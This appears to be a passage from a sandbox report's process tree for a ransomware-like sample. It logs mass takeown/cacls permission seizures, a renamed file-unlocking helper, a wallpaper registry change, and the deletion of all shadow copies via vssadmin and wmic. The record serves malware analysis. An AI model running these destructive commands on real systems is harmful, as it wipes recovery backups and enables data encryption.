  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rFvbSz0y.bat" "C:\Program Files\Windows Photo Viewer\ImagingDevices.exe""
  2⤵
  PID:8016
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rFvbSz0y.bat" "C:\Program Files\Windows Photo Viewer\de-DE\PhotoViewer.dll.mui""
  2⤵
  PID:1996
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rFvbSz0y.bat" "C:\Program Files (x86)\Windows Photo Viewer\de-DE\ImagingDevices.exe.mui""
  2⤵
  PID:7844
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\de-DE\ImagingDevices.exe.mui"
    3⤵
    - Modifies file permissions
    PID:4664
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\de-DE\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:5420
- - C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
    qL02HjdX.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6508
  - - C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
      qL02HjdX.exe -accepteula "00000004.bin" -nobanner
      4⤵
      PID:7040
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c qL02HjdX.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:8020
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rFvbSz0y.bat" "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\PhotoAcq.dll.mui""
  2⤵
  PID:6780
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:7588
- - C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
    qL02HjdX.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5788
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c qL02HjdX.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:5712
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\PhotoAcq.dll.mui"
    3⤵
    - Modifies file permissions
    PID:7156
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rFvbSz0y.bat" "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoViewer.dll.mui""
  2⤵
  PID:6260
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rFvbSz0y.bat" "C:\Users\Admin\AppData\Local\Microsoft\GameDVR\KnownGameList.bin""
  2⤵
  PID:5884
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rFvbSz0y.bat" "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.357c6337-0e71-496d-aa02-07a028cd6f4c.1.etl""
  2⤵
  PID:6204
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rFvbSz0y.bat" "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-H""
  2⤵
  PID:4588
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rFvbSz0y.bat" "C:\Program Files (x86)\Windows Photo Viewer\it-IT\PhotoViewer.dll.mui""
  2⤵
  PID:6476
- - C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
    qL02HjdX.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5872
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c qL02HjdX.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:6632
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\it-IT\PhotoViewer.dll.mui"
    3⤵
    - Modifies file permissions
    PID:6572
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rFvbSz0y.bat" "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.75a1645f-fdf7-490a-a1bc-44eed3ba3e28.1.etl""
  2⤵
  PID:5296
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rFvbSz0y.bat" "C:\ProgramData\USOShared\Logs\System\WuProvider.72576906-66a5-4c3b-bd64-d6e0d90d7de6.1.etl""
  2⤵
  PID:8032
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\USOShared\Logs\System\WuProvider.72576906-66a5-4c3b-bd64-d6e0d90d7de6.1.etl" /E /G Admin:F /C
    3⤵
    PID:1996
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c qL02HjdX.exe -accepteula "WuProvider.72576906-66a5-4c3b-bd64-d6e0d90d7de6.1.etl" -nobanner
    3⤵
    PID:7872
  - - C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
      qL02HjdX.exe -accepteula "WuProvider.72576906-66a5-4c3b-bd64-d6e0d90d7de6.1.etl" -nobanner
      4⤵
      PID:5476
- - C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
    qL02HjdX.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:7568
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\USOShared\Logs\System\WuProvider.72576906-66a5-4c3b-bd64-d6e0d90d7de6.1.etl"
    3⤵
    - Modifies file permissions
    PID:7624
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rFvbSz0y.bat" "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.5ba0a2af-7e1c-49f3-91a4-2be07a526418.1.etl""
  2⤵
  PID:6788
- - C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
    qL02HjdX.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6112
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c qL02HjdX.exe -accepteula "MoUsoCoreWorker.5ba0a2af-7e1c-49f3-91a4-2be07a526418.1.etl" -nobanner
    3⤵
    PID:5132
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.5ba0a2af-7e1c-49f3-91a4-2be07a526418.1.etl"
    3⤵
    PID:5440
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rFvbSz0y.bat" "C:\Program Files (x86)\Windows Photo Viewer\de-DE\PhotoAcq.dll.mui""
  2⤵
  PID:5156
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\de-DE\PhotoAcq.dll.mui"
    3⤵
    PID:5192
- - C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
    qL02HjdX.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6036
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c qL02HjdX.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:2832
- - C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
    qL02HjdX.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:7848
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c qL02HjdX.exe -accepteula "wab.exe" -nobanner
    3⤵
    PID:7972
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Mail\wab.exe"
    3⤵
    PID:5216
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Mail\wab.exe" /E /G Admin:F /C
    3⤵
    PID:5880
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rFvbSz0y.bat" "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\PhotoViewer.dll.mui""
  2⤵
  PID:4284
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:7328
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c qL02HjdX.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:7272
  - - C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
      qL02HjdX.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      PID:7864
- - C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
    qL02HjdX.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2780
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\PhotoViewer.dll.mui"
    3⤵
    - Modifies file permissions
    PID:7484
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rFvbSz0y.bat" "C:\Program Files (x86)\Windows Photo Viewer\de-DE\PhotoViewer.dll.mui""
  2⤵
  PID:5636
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\de-DE\PhotoViewer.dll.mui"
    3⤵
    - Modifies file permissions
    PID:7588
- - C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
    qL02HjdX.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:844
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c qL02HjdX.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:8060
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\de-DE\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:6800
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rFvbSz0y.bat" "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe""
  2⤵
  PID:7332
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c qL02HjdX.exe -accepteula "ImagingDevices.exe" -nobanner
    3⤵
    PID:7308
  - - C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
      qL02HjdX.exe -accepteula "ImagingDevices.exe" -nobanner
      4⤵
      PID:5664
- - C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
    qL02HjdX.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6036
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"
    3⤵
    - Modifies file permissions
    PID:3908
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe" /E /G Admin:F /C
    3⤵
    PID:7480
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rFvbSz0y.bat" "C:\Program Files (x86)\Windows Photo Viewer\es-ES\PhotoViewer.dll.mui""
  2⤵
  PID:7360
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\es-ES\PhotoViewer.dll.mui"
    3⤵
    - Modifies file permissions
    PID:384
- - C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
    qL02HjdX.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6168
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c qL02HjdX.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:6936
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\es-ES\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:3244
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rFvbSz0y.bat" "C:\Program Files (x86)\Windows Mail\wab.exe""
  2⤵
  PID:5156
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rFvbSz0y.bat" "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\PhotoViewer.dll.mui""
  2⤵
  PID:6704
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:7224
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c qL02HjdX.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:5088
  - - C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
      qL02HjdX.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      PID:7804
- - C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
    qL02HjdX.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6548
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\PhotoViewer.dll.mui"
    3⤵
    - Modifies file permissions
    PID:2768
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rFvbSz0y.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000004.bin""
  2⤵
  PID:7584
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000004.bin" /E /G Admin:F /C
    3⤵
    PID:7160
- - C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
    qL02HjdX.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6540
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c qL02HjdX.exe -accepteula "00000004.bin" -nobanner
    3⤵
    PID:6508
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000004.bin"
    3⤵
    - Modifies file permissions
    PID:7988
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rFvbSz0y.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000H.bin""
  2⤵
  PID:7048
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000H.bin" /E /G Admin:F /C
    3⤵
    PID:7024
- - C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
    qL02HjdX.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:7408
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c qL02HjdX.exe -accepteula "0000000H.bin" -nobanner
    3⤵
    PID:6952
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000H.bin"
    3⤵
    - Modifies file permissions
    PID:868
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rFvbSz0y.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000S.bin""
  2⤵
  PID:5736
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000S.bin"
    3⤵
    - Modifies file permissions
    PID:5352
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c qL02HjdX.exe -accepteula "0000000S.bin" -nobanner
    3⤵
    PID:3656
  - - C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
      qL02HjdX.exe -accepteula "0000000S.bin" -nobanner
      4⤵
      PID:5372
- - C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
    qL02HjdX.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6828
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000S.bin" /E /G Admin:F /C
    3⤵
    PID:2860
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rFvbSz0y.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000016.bin""
  2⤵
  PID:5508
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000016.bin"
    3⤵
    - Modifies file permissions
    PID:7336
- - C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
    qL02HjdX.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4484
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c qL02HjdX.exe -accepteula "00000016.bin" -nobanner
    3⤵
    PID:7504
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000016.bin" /E /G Admin:F /C
    3⤵
    PID:3268
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rFvbSz0y.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000050.bin""
  2⤵
  PID:5620
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000050.bin"
    3⤵
    - Modifies file permissions
    PID:2480
- - C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
    qL02HjdX.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:7352
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rFvbSz0y.bat" "C:\ProgramData\USOShared\Logs\System\NotificationUxBroker.acde0ccd-18ae-4ccd-8701-1d6d722663b5.1.etl""
  2⤵
  PID:7532
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c qL02HjdX.exe -accepteula "NotificationUxBroker.acde0ccd-18ae-4ccd-8701-1d6d722663b5.1.etl" -nobanner
    3⤵
    PID:7396
- - C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
    qL02HjdX.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:7128
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\USOShared\Logs\System\NotificationUxBroker.acde0ccd-18ae-4ccd-8701-1d6d722663b5.1.etl"
    3⤵
    - Modifies file permissions
    PID:5260
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\USOShared\Logs\System\NotificationUxBroker.acde0ccd-18ae-4ccd-8701-1d6d722663b5.1.etl" /E /G Admin:F /C
    3⤵
    PID:7824
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rFvbSz0y.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006S.bin""
  2⤵
  PID:4036
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006S.bin"
    3⤵
    - Modifies file permissions
    PID:7064
- - C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
    qL02HjdX.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:7600
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c qL02HjdX.exe -accepteula "0000006S.bin" -nobanner
    3⤵
    PID:6068
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006S.bin" /E /G Admin:F /C
    3⤵
    PID:928
- - C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
    qL02HjdX.exe -accepteula "00000095.bin" -nobanner
    3⤵
    PID:5992
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rFvbSz0y.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000076.bin""
  2⤵
  PID:4076
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000076.bin" /E /G Admin:F /C
    3⤵
    PID:2720
- - C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
    qL02HjdX.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5056
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c qL02HjdX.exe -accepteula "00000076.bin" -nobanner
    3⤵
    PID:2212
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000076.bin"
    3⤵
    - Modifies file permissions
    PID:6176
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rFvbSz0y.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007G.bin""
  2⤵
  PID:6416
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007G.bin" /E /G Admin:F /C
    3⤵
    PID:1252
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007G.bin"
    3⤵
    - Modifies file permissions
    PID:2376
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c qL02HjdX.exe -accepteula "0000007G.bin" -nobanner
    3⤵
    PID:5620
  - - C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
      qL02HjdX.exe -accepteula "0000007G.bin" -nobanner
      4⤵
      PID:7428
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c qL02HjdX.exe -accepteula "00000050.bin" -nobanner
      4⤵
      PID:5656
  - - C:\Windows\SysWOW64\cacls.exe
      cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000050.bin" /E /G Admin:F /C
      4⤵
      PID:7388
- - C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
    qL02HjdX.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6896
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rFvbSz0y.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007Q.bin""
  2⤵
  PID:7040
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007Q.bin"
    3⤵
    - Modifies file permissions
    PID:3940
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c qL02HjdX.exe -accepteula "0000007Q.bin" -nobanner
    3⤵
    PID:7860
- - C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
    qL02HjdX.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5772
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007Q.bin" /E /G Admin:F /C
    3⤵
    PID:2876
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rFvbSz0y.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008F.bin""
  2⤵
  PID:2752
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008F.bin"
    3⤵
    - Modifies file permissions
    PID:5364
- - C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
    qL02HjdX.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1820
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c qL02HjdX.exe -accepteula "0000008F.bin" -nobanner
    3⤵
    PID:5932
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008F.bin" /E /G Admin:F /C
    3⤵
    PID:7432
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rFvbSz0y.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000095.bin""
  2⤵
  PID:6904
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000095.bin"
    3⤵
    - Modifies file permissions
    PID:5904
- - C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
    qL02HjdX.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2252
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c qL02HjdX.exe -accepteula "00000095.bin" -nobanner
    3⤵
    PID:4036
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000095.bin" /E /G Admin:F /C
    3⤵
    PID:6504
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rFvbSz0y.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000C.bin""
  2⤵
  PID:8080
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000C.bin" /E /G Admin:F /C
    3⤵
    PID:6188
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000C.bin"
    3⤵
    - Modifies file permissions
    PID:2916
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rFvbSz0y.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A0.bin""
  2⤵
  PID:5628

C:\Windows\SysWOW64\reg.exe
reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\IfiP0jkq.bmp" /f
1⤵
PID:2924

C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
qL02HjdX.exe -accepteula "store.db" -nobanner
1⤵
PID:1152

C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
qL02HjdX.exe -accepteula "classes.jsa" -nobanner
1⤵
PID:7504

C:\Windows\SYSTEM32\cmd.exe
C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\wuAv3cia.bat"
1⤵
PID:7448
- C:\Windows\system32\vssadmin.exe
  vssadmin Delete Shadows /All /Quiet
  2⤵
  - Interacts with shadow copies
  PID:4020
- C:\Windows\System32\Wbem\WMIC.exe
  wmic SHADOWCOPY DELETE
  2⤵
  PID:5124

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files\Java\jre-1.8\bin\server\classes.jsa" /E /G Admin:F /C
1⤵
PID:5152

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files\Java\jre-1.8\bin\server\classes.jsa"
1⤵
- Modifies file permissions
PID:944

C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
qL02HjdX.exe -accepteula "classes.jsa" -nobanner
1⤵
PID:7728

C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
qL02HjdX.exe -accepteula "store.db" -nobanner
1⤵
PID:6508

C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
qL02HjdX.exe -accepteula "ImagingDevices.exe.mui" -nobanner
1⤵
PID:7976

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files\Windows Photo Viewer\de-DE\PhotoViewer.dll.mui"
1⤵
- Modifies file permissions
PID:6568

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files\Windows Photo Viewer\ImagingDevices.exe"
1⤵
- Modifies file permissions
PID:1424
- C:\Users\Admin\AppData\Local\Temp\qL02HjdX.exe
  qL02HjdX.exe -accepteula "ImagingDevices.exe.mui" -nobanner
  2⤵
  PID:6656

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui" /E /G Admin:F /C
1⤵
PID:7024

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files\Windows Photo Viewer\it-IT\PhotoViewer.dll.mui" /E /G Admin:F /C
1⤵
